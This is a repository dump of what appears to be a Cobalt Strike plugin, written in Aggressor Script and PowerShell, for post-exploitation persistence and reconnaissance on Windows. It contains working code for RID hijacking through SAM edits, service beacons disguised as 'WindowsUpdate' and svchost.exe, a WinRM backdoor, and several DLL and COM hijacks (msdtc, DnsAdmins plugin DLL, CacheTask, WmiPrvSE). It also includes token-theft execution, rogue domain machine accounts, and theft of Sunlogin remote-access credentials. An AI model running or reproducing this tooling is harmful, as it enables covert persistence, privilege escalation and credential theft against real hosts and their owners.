https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/tokenrun/2.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/1.png -------------------------------------------------------------------------------- 
/权限维持/img/userAccountControl/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/2.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/3.png -------------------------------------------------------------------------------- /权限维持/img/userAccountControl/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/img/userAccountControl/4.png -------------------------------------------------------------------------------- /权限维持/ridhijack.ps1: --------------------------------------------------------------------------------
# RID hijack (run by service_c2.cna via bpowerpick after substituting XXXXXXXXXXXX):
# exports the SAM key of the built-in Guest account (000001F5 = RID 501), overwrites
# the RID bytes in that export with the caller-supplied little-endian hex value
# (the default "f401" is 0x01F4 = 500, the built-in Administrator RID) and imports it back.
# Requires an elevated context. NOTE(review): the regini ACL edit below is never reverted,
# and the "[1 17]" entries appear to grant Administrators and SYSTEM full control on
# HKLM\SAM (per regini's ACL table - confirm); both that ACL change and the SAM edit are
# persistent, auditable modifications on the host.
write-host "Rid Hijack Start"
# regini script: one "<key> [<ACL ids>]" line for every key on the path down to the Guest user key.
$inidata="HKEY_LOCAL_MACHINE\SAM [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1 17]"
$inipath=$PWD.Path+"\a.ini"
[System.Io.File]::WriteAllText($inipath,$inidata)
write-host "Edit HKLM\SAM ACL"
regini $inipath
# Export the Guest user key; its binary value holds the RID that is rewritten below.
reg export 'HKLM\SAM\SAM\Domains\Account\Users\000001F5' .\export.reg /y
# $calc is unused.
$calc=0
# Placeholder replaced by the caller with the hex bytes of the new RID.
$rid="XXXXXXXXXXXX"
$rid_=""
# Re-join the hex digits as comma-separated bytes ("f401" -> "f4,01"), the layout
# reg export uses for hex values.
for($x=0;$x -lt $rid.Length;$x++){
$rid_+=$rid[$x]
if($x%2 -eq 1){
$rid_+=","
}
}
$rid_=$rid_.TrimEnd(",")
# Index of the last byte to overwrite (number of bytes in $rid minus one).
$number=$rid.length/2-1
$path=$PWD.Path+"\export.reg"
# Assumes the RID bytes sit at the start of line 6 of the export - this depends on
# reg export's line-wrapping of the value; TODO confirm on each OS build.
$data=(Get-Content $path -TotalCount 7)[-2]
$datas=$data -split ","
$yuan=[System.String]::Join(",",$datas[0..$number])
# -replace is a regex replace of the first match; $yuan (hex digits, commas and
# leading spaces) is used verbatim as the pattern.
$xg=$data -replace $yuan," $rid_"
$filecontent=[System.IO.File]::ReadAllText($path)
$xg2=$filecontent.Replace($data,$xg)
[System.Io.File]::WriteAllText($path,$xg2)
reg import .\export.reg
write-host "Rid Hijack Sucess"
# Remove the two temporary files; the registry ACL change is left in place.
Remove-Item $inipath
Remove-Item $path
-------------------------------------------------------------------------------- /权限维持/ridquery.ps1: --------------------------------------------------------------------------------
# Lists local accounts with their SID and the RID rendered in the byte-swapped hex
# form that ridhijack.ps1 expects (e.g. RID 500 -> "f401").
$data=Get-WmiObject -Class Win32_UserAccount | Select-Object Name,SID
foreach($n in $data){
$username=$n.Name
$sid=$n.SID -split "-"
# The last SID component is the RID; render it as hex.
$sid=[Convert]::ToString($sid[-1],16)
$number=$sid.Length%2
if($number -eq 1){
# Pad to an even number of hex digits, then swap the two bytes.
$rid="0"+$sid
$rid=[System.String]::Join("",$rid[-2..-1]+$rid[0..1])
}
# NOTE(review): $rid is only assigned inside the odd-length branch, so for an
# even-length hex RID (e.g. 0x1000) this line prints the previous account's $rid
# (or nothing for the first account). The byte swap also only handles a 2-byte RID.
write-host "Name:"$username "Sid:"$sid "Rid:"$rid
}
-------------------------------------------------------------------------------- /权限维持/service_c2.cna: --------------------------------------------------------------------------------
sub servicerun{
$exename = $3["exename"];
$data = artifact_payload("$3['listener']", "svcexe", "$3['arch']");
$handle = openf(">$exename");
writeb($handle, $data);
closef($handle);
btask($3["bid"], "生成服务马,Listener:$3['listener'] 位数:$3['arch'] 保存名称:$exename");
bupload($3["bid"], script_resource($exename));
bmv($3['bid'], $exename, $3["uploadoutpath"].$exename);
btask($3["bid"], "上传到$3['uploadoutpath']");
$command = "sc create WindowsUpdate binPath= ".$3['uploadoutpath'].$exename." 
start= auto obj= LocalSystem DisplayName= windowsupdate";
    # NOTE(review): the service name is hard-coded to "WindowsUpdate" even though the
    # servicebeacon dialog collects a "servicename" field; $3['servicename'] is never read.
    # Also note that openf(">$exename") writes relative to the client's working directory
    # while script_resource($exename) resolves relative to this script's directory - the
    # upload only finds the file when the two coincide.
    btask($3["bid"], "run $command");
    bshell($3["bid"], $command);
    btask($3["bid"], "Query WindowsUpdate Service");
    bshell($3["bid"], "sc qc WindowsUpdate");
    btask($3["bid"], "Run WindowsUpdate Service");
    bshell($3["bid"], "sc start WindowsUpdate");
}

# Dialog callback: enables WinRM on the beacon host and configures an HTTP listener
# on $3['port']. Commands are issued to the global $bid set by the popup item.
# NOTE(review): the condition only tests that a beacon id was passed in the dialog
# values - no admin check is performed, so the "Not an administrator" message in
# the else branch is misleading.
sub winrm_set{
    if ($3['bid']) {
        btask($bid ,"setting winrm");
        bshell($bid, "winrm quickconfig -q");
        bshell($bid, 'winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}');
        bshell($bid, "winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port=\"$3['port']\"}");
        # winrm/config/Client is the client-side configuration of the beacon host itself.
        bshell($bid, "winrm set winrm/config/Client @{TrustedHosts=\"*\"}");
        btask($bid, "winrm config");
        bshell($bid, "winrm e winrm/config/listener");
        # btask($bid,"Client-side usage: winrm quickconfig -q\nwinrm set winrm/config/Client @{TrustedHosts="*"}\nwinrs -r:: -u: -p: \nExample:winrs -r:http://127.0.0.1:80 -u:administrator -p:123456 whoami");
    }else{
        berror($3['bid'], "Not an administrator");
    }
}

# Shows the WinRM port dialog; the result is handled by winrm_set.
sub winrm_config{
    $dialog = dialog("Winrm config", %(port => "80", bid => $bid), &winrm_set);
    dialog_description($dialog, "winrm后门端口设置\nwindows server 2008或以下端口默认为80端口(端口复用),无法进行修改");
    drow_text($dialog, "port", "port:");
    dbutton_action($dialog, "run");
    dialog_show($dialog);
}


# Information gathering helpers. Each takes the beacon id(s) in the global $bid.
# Lists USB storage devices seen by the host (USBSTOR enumeration keys).
sub usbhistory{
    bpowerpick($bid, "Get-ItemProperty -Path HKLM:\\SYStem\\CurrentControlSet\\Enum\\USBSTOR\\*\\* | Select FriendlyName");
}

# Uses "net time /domain" as a probe for domain membership and, if joined, dumps the IP global properties.
sub checkdomain{
    btask($bid, "test");
    bpowerpick($bid, "\$time=net time /domain;if(\$time -eq \$null){write-host \"机器不在域内\"}else{write-host \"机器在域内\";[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()}");
}

# Logical drives and their file systems.
sub deviceget{
    bshell($bid, "wmic logicaldisk get deviceid,FileSystem");
}

# Installed software (MSI products only - wmic product enumerates the installer database).
sub getinstall{
    bshell($bid, "wmic product get name");
}


# OS name, version and architecture.
sub getosinfo{
    bshell($bid, "wmic os get name,Version,OSArchitecture");
}


# Network adapter configuration.
sub nicconfiginfo{
    bshell($bid, "wmic NICCONFIG get Description,IPAddress,IPSubnet,MACAddress,DHCPServer");
}


# Computer, CPU and memory details.
sub computergetinfo{
    bshell($bid, "wmic COMPUTERSYSTEM get UserName,Workgroup,SystemFamily");
    bshell($bid, "wmic cpu get Name,AddressWidth");
    bshell($bid, "wmic MEMORYCHIP get PartNumber,Capacity,Speed");
}

# Local/domain user accounts with SID and password flags.
sub usergetinfo{
    bshell($bid, "wmic USERACCOUNT get Name,Domain,SID,Disabled,PasswordChangeable,PasswordRequired");
}

# Groups with SID.
sub groupgetinfo{
    bshell($bid, "wmic group get Description,Name,SID");
}

# Dialog callback for the msdtc DLL hijack: stops msdtc, replaces oci.dll under
# $3['file2'] with the chosen local DLL, sets the service to auto-start as LocalSystem
# and starts it again. Beacons that are not admin are skipped with a message.
# NOTE(review): "\\\\oci.dll" in a Sleep double-quoted string yields two backslashes, so
# $dllname_w becomes e.g. C:\Windows\System32\\oci.dll; Windows path normalisation
# appears to tolerate it, but a single separator would be cleaner.
sub msdtc_config{
    $dll = $3['file'];
    $name = split("\\\\", $dll);
    $dllname = $name[-1];
    $dllname_w = $3['file2']."\\\\oci.dll";
    foreach $id ($bid){
        if(-isadmin $id){
            btask($id, "配置msdtc dll劫持");
            bshell($id, "sc stop msdtc");
            bshell($id, "del C:\\Windows\\System32\\oci.dll /F");
            bupload($id, $dll);
            bmv($id, $dllname, $dllname_w);
            bshell($id, "sc config msdtc start= auto");
            bshell($id, "sc config msdtc obj= LocalSystem");
            bshell($id, "sc start msdtc");
        }else{
            btask($id, "不是Administrator权限");
        }
    }
}

# Shows the msdtc dialog; handled by msdtc_config.
sub msdtc{
    $dialog = dialog("msdtc DLL hijack config", %(file => "",file2 => "C:\\Windows\\System32"), &msdtc_config);
    dialog_description($dialog, "msdtc DLL劫持");
    drow_file($dialog, "file", "DLL Path:");
    drow_text($dialog, "file2", "RHOST Path:");
    dbutton_action($dialog, "RUN");
    dialog_show($dialog);
}

# Dialog callback: uploads the chosen DLL as <uploadpath>raj.dll, registers it as the
# DNS server's ServerLevelPluginDll and restarts the DNS service so it is loaded.
# NOTE(review): the remote file name is hard-coded to raj.dll regardless of the chosen
# file; no admin/DnsAdmins check is made before the bupload!/bshell! calls; the two
# println() calls only print to the client console.
sub dnsadminrun{
    println($3);
    $dll = split("\\\\", $3['dllpath'])[-1];
    $dllname = $3['uploadpath']."raj.dll";
    println($3['uploadpath']."raj.dll");
    bupload!($3['bid'], $3['dllpath']);
    bmv!($3['bid'], $dll, $dllname);
    bshell!($3['bid'], "dnscmd /config /serverlevelplugindll ".$dllname);
    bshell!($3['bid'], "sc stop dns");
    bshell!($3['bid'], "sc start dns");
}

# Shows one DnsAdmins dialog per selected beacon; handled by dnsadminrun.
sub dnsadmin_config{
    foreach $id ($bid){
        $dialog = dialog("DnsAdminConfig", %(uploadpath => "C:\\Windows\\System32\\", bid => $id), &dnsadminrun);
        dialog_description($dialog, "DnsAdmins权限维持");
        drow_text($dialog, "uploadpath", "uploadpath:");
        drow_file($dialog, "dllpath", "dllpath:" );
        dbutton_action($dialog, "run");
        dialog_show($dialog);
    }
}

# Dialog callback: uploads the DLL to $3['uploadpath'] and registers it under HKCU as
# the in-process server for CLSID {0358B920-0AC7-461F-98F4-58E32CD89148} (per-user
# COM hijack, so no admin rights are needed for the registry writes).
# NOTE(review): the last bshell! statement has no terminating semicolon - Sleep may
# or may not accept that before "}"; confirm the script still loads cleanly.
sub CacheTaskExec{
    btask($3['bid'], "CacheTask任务计划COM接口DLL劫持");
    $dllname = split("\\\\", $3['dllpath'])[-1];
    bupload!($3['bid'], $3['dllpath']);
    bmv!($3['bid'], $dllname, $3['uploadpath']);
    bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /ve /t REG_SZ /d $3['uploadpath']");
    bshell!($3['bid'], "reg add \"HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /v ThreadingModel /t REG_SZ /d Both")
}

# Shows one CacheTask dialog per selected beacon; handled by CacheTaskExec.
sub CacheTask{
    foreach $id ($bid){
        $dialog = dialog("CacheTask", %(uploadpath => "C:\\Windows\\Temp\\test.dll", bid => $id), &CacheTaskExec);
        dialog_description($dialog, "CacheTask任务计划COM接口DLL劫持,适用系统:Windows 10/Windows Server 2012或以上");
        drow_text($dialog, "uploadpath", "uploadpath:");
        drow_file($dialog, "dllpath", "dllpath:");
        dbutton_action($dialog, "run");
        dialog_show($dialog);
    }
}


# Shows one service-beacon dialog per selected beacon; handled by servicerun.
# The "servicename" field is collected but servicerun does not use it (see above).
sub servicebeacon{
    foreach $id ($bid){
        $dialog = dialog("ServiceRunBeacon", %(uploadoutpath => "C:\\Windows\\Temp\\", arch => barch($id) ,exename => "svchost.exe", servicename => "WindowsUpdate", bid => $id), &servicerun);
        dialog_description($dialog, "生成服务马上传执行,进行权限维持");
        drow_text($dialog, "arch", "arch:");
        drow_text($dialog, "uploadoutpath", "uploadoutpath:");
        drow_text($dialog, "servicename", "servicename:");
        drow_text($dialog, "exename", "outputexename:");
        drow_listener($dialog, "listener", "Listener: ");
        dbutton_action($dialog, "run");
        dialog_show($dialog);
    }

}

# Inline copy of ridquery.ps1: prints each local account's SID and its RID in the
# byte-swapped hex form the RID hijack dialog expects.
# NOTE(review): as in ridquery.ps1, $rid is only set in the odd-length branch, so an
# even-length hex RID prints the previous account's value.
sub ridquery{
    $command = "\$data=Get-WmiObject -Class Win32_UserAccount | Select-Object Name,SID
foreach(\$n in \$data){
\$username=\$n.Name
\$sid=\$n.SID -split \"-\"
\$sid=[Convert]::ToString(\$sid[-1],16)
\$number=\$sid.Length%2
if(\$number -eq 1){
\$rid=\"0\"+\$sid
\$rid=[System.String]::Join(\"\",\$rid[-2..-1]+\$rid[0..1])
}
write-host \"Name:\"\$username \"Sid:\"\$sid \"Rid:\"\$rid
}";
    foreach $id ($bid){
        bpowerpick($id, $command);
    }
}

# Dialog callback: reads ridhijack.ps1 from the script directory, substitutes the
# XXXXXXXXXXXX placeholder with the chosen hex RID and runs it via powerpick.
sub ridhijack{
    $handle = openf(script_resource("ridhijack.ps1"));
    $data = readb($handle, -1);
    closef($handle);
    $data = replace($data, "XXXXXXXXXXXX", $3['rid']);
    bpowerpick($3['bid'], $data);
}


# Shows one RID hijack dialog per selected beacon; handled by ridhijack.
sub ridrun{
    foreach $id ($bid){
        $dialog = dialog("Rid Hijack", %(rid => "f401", bid => $id), &ridhijack);
        dialog_description($dialog, "RID劫持,将Guest的RID改为别的用户的RID");
        drow_text($dialog, "rid", "RID:");
        dbutton_action($dialog, "Run");
        dialog_show($dialog);
    }
}

# Dialog callback: fills the lnkcreate.vbs template with the dialog values, uploads it
# as test.vbs, runs it with cscript and deletes it again.
# NOTE(review): lnkcreate.vbs is not shipped next to this script in the repository
# listing - confirm it exists, otherwise openf() yields nothing to upload. The
# "hostkeyname" value is never shown in the dialog, so the default "CTRL+C" is always used.
sub lnkreate{
    if (-isFile "test.vbs")
    {
        deleteFile("test.vbs");
    }
    $file = openf(script_resource("lnkcreate.vbs"));
    $data = readb($file, -1);
    $data = replace($data, "lnkname", $3["lnkname"]);
    $data = replace($data, "exename", $3["exename"]);
    $data = replace($data, "argsname", $3["argsname"]);
    $data = replace($data, "directoryname", $3["directoryname"]);
    $data = replace($data, "hostkeyname", $3["hostkeyname"]);
    $handle = openf(">test.vbs");
    writeb($handle, $data);
    closef($file);
    closef($handle);
    btask($3["bid"], "Create Vbs,Upload");
    bupload($3["bid"], "test.vbs");
    btask($3["bid"], "Run Vbs");
    bshell($3["bid"], "cscript test.vbs");
    btask($3["bid"], "Check Desktop default.lnk -> dir C:\\Users\\\\Desktop /a | findstr 'default.lnk'");
    brm($3["bid"], "test.vbs");
}

# Shows one lnk-hotkey dialog per selected beacon; handled by lnkreate.
sub lnkreateconfig{
    foreach $id ($bid){
        $dialog = dialog("lnk快捷键劫持", %(lnkname => "default.lnk", exename => "cmd.exe", argsname => "/c calc.exe", directoryname => "C:", hostkeyname => "CTRL+C", bid => $id), &lnkreate);
        dialog_description($dialog, "参考链接:https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence");
        drow_text($dialog, "lnkname", "lnkname:");
        drow_text($dialog, "exename", "exename:");
        drow_text($dialog, "argsname", "args:");
        drow_text($dialog, "directoryname", "directory:");
        dbutton_action($dialog, "Run");
        dialog_show($dialog);
    }
}

# Dialog callback: creates a machine account with the given password and sets its
# userAccountControl to 8192 (0x2000, SERVER_TRUST_ACCOUNT per the AD docs), then
# lists Domain Controllers. Requires the ActiveDirectory module and rights to write
# userAccountControl on the new object.
# NOTE(review): the account password is written in plaintext to the beacon log (blog).
sub userAccountControlidrun{
    foreach $id ($bid){
        $computername = $3["computername"];
        $computerpass = $3["computerpass"];
        btask($id, "Import Module ActiveDirectory");
        bpowershell($id, "Import-Module ActiveDirectory");
        btask($id, "AddComputer User");
        bpowershell($id, "New-ADComputer -Name $computername -AccountPassword (ConvertTo-SecureString -String \"$computerpass\" -Force -AsPlainText)");
        btask($id, "Set ComputerName:$computername userAccountControl=8192");
        bpowershell($id, "\$ADComputer=Get-ADComputer -Identity $computername\;Set-ADObject -Identity \$ADComputer -Replace @{userAccountControl=8192}");
        bpowershell($id, "Get-ADGroupMember -Identity \"Domain Controllers\"");
        blog($id, "computername:$computername computerpass:$computerpass");
        blog($id, "runas /user:\\$computername\$ /netonly cmd");
    }
}

# Shows the machine-account dialog; handled by userAccountControlidrun.
sub userAccountControlidconfig{
    $dialog = dialog("userAccountControl配置ID设置", %(bid => $bid, computername => "sangfor", computerpass => "sangfor123456"), &userAccountControlidrun);
    dialog_description($dialog, "新建机器账户将userAccountControl ID设置为8192。使用于存在于ActiveDirectory模块的机器上执行");
    drow_text($dialog, "computername", "ComputerName:");
    drow_text($dialog, "computerpass", "ComputerPass:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}

# Dialog callback: uploads the chosen .class file to the beacon's current directory and
# runs it with <JDKPATH>\java.exe <classname>.
# NOTE(review): the "remote" dialog value (RemoteUploadPath) is never used; the class
# file always lands in the beacon's working directory.
sub javarun {
    foreach $id ($bid){
        $path = $3["path"]. "\\". "java.exe";
        $classpath = $3["classpath"];
        $filename = split("\\\\", $classpath)[-1];
        $classname = replace($filename, ".class", "");
        bupload($id, $classpath);
        bshell($id, "\"$path\" $classname");
        println("$id $path $classname");

    }
}

# Shows the java dialog; handled by javarun.
sub javarunconfig{
    $dialog = dialog("java运行class文件(一般可用于执行shellcode)", %(bid => $bid, path => "", classpath => "", remote => "C:\\Users\\Public"), &javarun);
    drow_text($dialog, "path", "JDKPATH:");
    drow_file($dialog, "classpath", "classfilePATH:");
    drow_text($dialog, "remote", "RemoteUploadPath:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}


# Dialog callback: runs systemcmd_cs.exe in memory with "<process name> <exe path>".
sub tokenrun_{
    foreach $id ($bid){
        bexecute_assembly($id, script_resource("systemcmd_cs.exe"), "$3['Process'] $3['ExecutePath']");
    }

}

# Shows the token-run dialog; handled by tokenrun_.
sub tokenrun{
    $dialog = dialog("tokenrun", %(bid => $bid, Process => "winlogon", ExecutePath => "C:\\Windows\\System32\\cmd.exe"), &tokenrun_);
    dialog_description($dialog, " #Process为进程名,ExecutePath为你要运行的EXE路径,如果进程的权限是SYSTEM,提权到SYSTEM杀毒会杀");
    drow_text($dialog, "Process","processname:");
    drow_text($dialog, "ExecutePath", "executepath:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}

# Dialog callback: runs addtask.exe (ConsoleApp1.cs) in memory with "<task name> <exe path>".
sub csharpaddtask_{
    foreach $id ($bid){
        bexecute_assembly($id, script_resource("addtask.exe"), "$3['taskName'] $3['taskPath']");
    }
}

# Shows the scheduled-task dialog; handled by csharpaddtask_.
sub csharpaddtask{
    $dialog = dialog("addtask", %(bid => $bid, taskName => "360update", taskPath => "C:\\Windows\\System32\\notepad.exe"), &csharpaddtask_);
    dialog_description($dialog, " taskName计划任务的名称,taskPath计划任务的目标程序");
    drow_text($dialog, "taskName","taskName:");
    drow_text($dialog, "taskPath", "taskPath:");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}

# Beacon context menu for the persistence functions. $1 is the list of selected
# beacon ids; items store it in the global $bid that the subs above read.
popup beacon_bottom{
    menu "&权限维持"{
        item "&cs服务马"{
            $bid = $1;
            servicebeacon($bid);
        }

        item "&winrm后门"{
            $bid = $1;
            winrm_config($bid);
        }

        item "&msdtc DLL劫持"{
            $bid = $1;
            msdtc($bid);

        }


        item "&WmiPrvSE劫持"{
            show_message("WmiPrvSE提权机会只有一次,失败就没了。一般系统运行只有一个WmiPrvSE.exe进程,当有超过一个WmiPrvSE.exe进程存在时。无法提权");
            WmiPrvSE_config($bid);
        }

        item "&CacheTask任务计划COM接口劫持"{
            CacheTask($bid);
        }

        menu "&RID劫持"{
            item "&本地windows用户RID查询"{
                ridquery($bid);
            }

            item "&RID劫持"{
                ridrun($bid);
            }
        }

        item "&lnk劫持快捷键" {
            lnkreateconfig($bid);
        }

        item "&java执行class" {
            javarunconfig($bid);
        }

        item "&以某个进程的Token运行EXE"{
            $bid = $1;
            tokenrun($bid);
        }

        item "&内存加载(C#)添加计划"{
            $bid = $1;
            csharpaddtask($bid);
        }

        menu "&域权限维持" {
            item "&dnsadmin后门"{
                $bid = $1;
                dnsadmin_config($bid);
            }
            item "&userAccountControl将ID设置为8192作为后门" {
                $bid = $1;
                userAccountControlidconfig($bid);
            }
        }

    }

}

# Dialog callback for the netsh portproxy dialogs. The global $set ("port" or
# "delete"), chosen by the menu item, selects add versus delete; the dialog values
# come in $3 and the beacon ids in the global $bid.
sub netsh_exec{
    if ($set eq "port"){
        $lhost = $3['lhost'];
        $rhost = $3['rhost'];
        $lport = $3['lport'];
        $rport = $3['rport'];
        foreach $id ($bid){
            btask($id, "端口转发:$lhost : $lport -> $rhost : $rport");
            bshell($id, "netsh interface portproxy add v4tov4 listenport=$lport listenaddress=$lhost connectport=$rport connectaddress=$rhost");
            btask($id, "查看端口转发列表");
            bshell($id, "netsh interface portproxy show all");

        }
    }else{
        $lhost = $3['lhost'];
        $lport = $3['lport'];
        foreach $id ($bid){
            btask($id, "删除端口转发:$lhost : $lport");
            bshell($id, "netsh interface portproxy delete v4tov4 listenport=$lport listenaddress=$lhost");
            btask($id, "查看端口转发列表");
            bshell($id, "netsh interface portproxy show all");
        }
    }
}

# Builds the portproxy dialog; which fields are shown depends on the global $set.
# The second positional argument passed by the menu items is unused.
sub netsh_poort{
    $dialog = dialog("netsh Port",%(lhost => "127.0.0.1", rhost => "192.168.1.2", lport => "4444", rport => "4444"), &netsh_exec);
    dialog_description($dialog, "netsh端口转发配置\nnetsh端口转发删除");
    if ($set eq "port"){
        drow_text($dialog, "lhost", "LHOST:");
        drow_text($dialog, "rhost", "RHOST:");
        drow_text($dialog, "lport", "LPORT:");
        drow_text($dialog, "rport", "RPORT:");
    }else{
        drow_text($dialog, "lport", "LPORT:");
        drow_text($dialog, "lhost", "LHOST:");
    }
    dbutton_action($dialog, "run");
    dialog_show($dialog);

}

# Dialog callback: uploads the chosen DLL to <uploadpath>\<dll> and rewrites the
# Dnscache service's Performance key so its Library/Open/Collect/Close values point
# at that DLL; the closing Win32_Perf* enumeration is presumably what makes the WMI
# performance provider load it (see the dialog description for the intended use).
# If the beacon is admin, WmiPrvSE.exe is killed first.
# NOTE(review): the $ps = bps(...) call references $data, which is never assigned,
# so its callback prints an empty value - it looks like leftover debugging. bps() is
# also handed the whole $bid list rather than a single id.
sub WmiPrvSE{
    $dllname = $3['dll'];
    $dllend = split("\\\\", $3['dll'])[-1];
    # println($dllend);
    $uploadpath = $3['uploadpath']."\\".$dllend;
    # println($uploadpath);
    $ps = bps($bid, lambda({
        println($data);
    }, $callback => $data));
    foreach $id ($bid){
        btask($id, "WmiPrvSE DLL劫持开始配置");
        if(-isadmin $id){
            btask($id, "当前为管理员权限,杀掉WmiPrvSE.exe进程");
            bshell($id, "taskkill /F /IM WmiPrvSE.exe");
            # btask($id, "restart the WmiPrvSE.exe process");
            # bshell($id, "WmiPrvSE.exe");
        }
        bupload($id, $dllname);
        bmv($id, $dllend, $uploadpath);
        bshell($id, "reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /F");
        bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /F");
        bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Close /t REG_SZ /d ClosePerfData /F");
        bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Collect /t REG_SZ /d CollectPerfData /F");
        bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Library /t REG_SZ /d ".$uploadpath." /F");
        bshell($id, "reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Dnscache\\Performance /v Open /t REG_SZ /d OpenData /F");
        bshell($id, "powershell -c \"Get-WmiObject -List | Where-Object {\$_.Name -Like \"\"Win32_Perf*\"\"\"\"}\"");
    }


}

# Shows the WmiPrvSE dialog; handled by WmiPrvSE.
sub WmiPrvSE_config{
    $dialog = dialog("WmiPrvSE_config",%(uploadpath => "C:\\Windows\\Temp"), &WmiPrvSE);
    dialog_description($dialog, "WmiPrvSE劫持\n提权适用于:Windows Server 2008\nWindows 7\n或更低版本\n或者用于做权限维持");
    drow_file($dialog, "dll", "dll:");
    drow_text($dialog, "uploadpath", "upload_path:");
    dbutton_action($dialog, "run");
    dialog_show($dialog);
}

# Returns the first beacon id of a selection (the loop returns on its first iteration).
sub GetBeaconId{
    foreach $id ($1){
        return $id;
    }
}

# Sunlogin (向日葵) remote-access client discovery for a single beacon $1: runs ps, and
# if a process whose name contains "SunloginClient" is found, prints the known config
# file locations, types each one and queries the Sunlogin registry keys under HKU\.DEFAULT.
# NOTE(review): binfo($1, "user") can carry a trailing " *" (Cobalt Strike's elevated
# marker); the loop below strips it by splitting on the regex " *", which splits at
# every character and relies on the last two elements being "" and "*" - it works for
# the observed format but is fragile.
sub SunloginClient{
    btask($1, "向日葵密码解密工具:https://github.com/wafinfo/Sunflower_get_Password");
    btask($1, "向日葵进程检测");
    $processname = "SunloginClient";
    $tasklist = bps($1, lambda({
        global('$pid $name $entry $foundid')
        foreach $entry (split("\n", $2)){
            ($name, $null, $pid) = split("\\s+", $entry);
            if(lindexOf($name, $processname) ne $null){
                $foundid++;
                blog2($1, "\c8$name $pid");
            }
        }
        if($foundid ne $null){
            btask($1, "向日葵配置文件获取");
            btask($1, "本机验证码参数:encry_pwd\n本机识别码参数:\c3fastcode(去掉开头字母)\n\c3sunlogincode:判断用户是否登录状态\n请判断config.ini配置文件中是否存在\c3sunlogincode参数,存在为登录状态否则未登录");
            btask($1, "安装版向日葵路径:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini");
            btask($1, "便携版(绿色版)向日葵路径: C:\\Users\\\\AppData\\Roaming\\Oray\\SunloginClientLite\\sys_lite_config.ini");
            btask($1, "便携版(绿色版)整体配置文件: C:\\ProgramData\\Oray\\SunloginClient\\config.ini")
            bshell($1, "type \"C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini\"");
            $currentuser = binfo($1, "user");
            if(lindexOf($currentuser, " *") ne $null){
                $tmp = split(" *", $currentuser);
                $tmplen = size($tmp) - 2;
                $tmpname = "";
                $calc = 0;
                foreach $x ($tmp){
                    if($calc ne $tmplen){
                        $tmpname .= $x;
                        $calc++;
                    }
                }
                $currentuser = $tmpname;
            }
            bshell($1, "type \"C:\\Users\\$currentuser\\AppData\\Roaming\\Oray\\SunloginClientLite\\sys_lite_config.ini\"");
            bshell($1, "type \"C:\\ProgramData\\Oray\\SunloginClient\\config.ini\"");
            btask($1, "向日葵配置注册表信息获取");
            $arch = binfo($1, "arch");
            breg_query($1, "HKU\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo", $arch);
            breg_query($1, "HKU\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo", $arch);
        }
    }, $callback => $2));
}

popup beacon_bottom{
    menu "&信息收集"{
        $bid = $1;
        item "&usb历史记录信息收集"{
            usbhistory($bid);
        }

        item "&判断是否存在域"{
            checkdomain($bid);
        }

        item "&获取系统盘符"{
            deviceget($bid);
        }

        item "&已安装的软件"{
            getinstall($bid);
        }

        item "&系统基本信息获取"{
            getosinfo($bid);
        }

        item "&网络信息查询"{
            nicconfiginfo($bid);
        }

        item "&配置查询"{
            computergetinfo($bid);
        }

        item "&用户查询"{
            usergetinfo($bid);
        }

        item "&用户组查询"{
            groupgetinfo($bid);
        }

        menu "&netsh"{
            item "&netsh端口转发设置"{
                $set ="port";
                netsh_poort($bid, $port);
            }

            item "&netsh端口转发列表查询"{
                foreach $id ($bid){
                    bshell($id, "netsh interface portproxy show all");
                }
            }

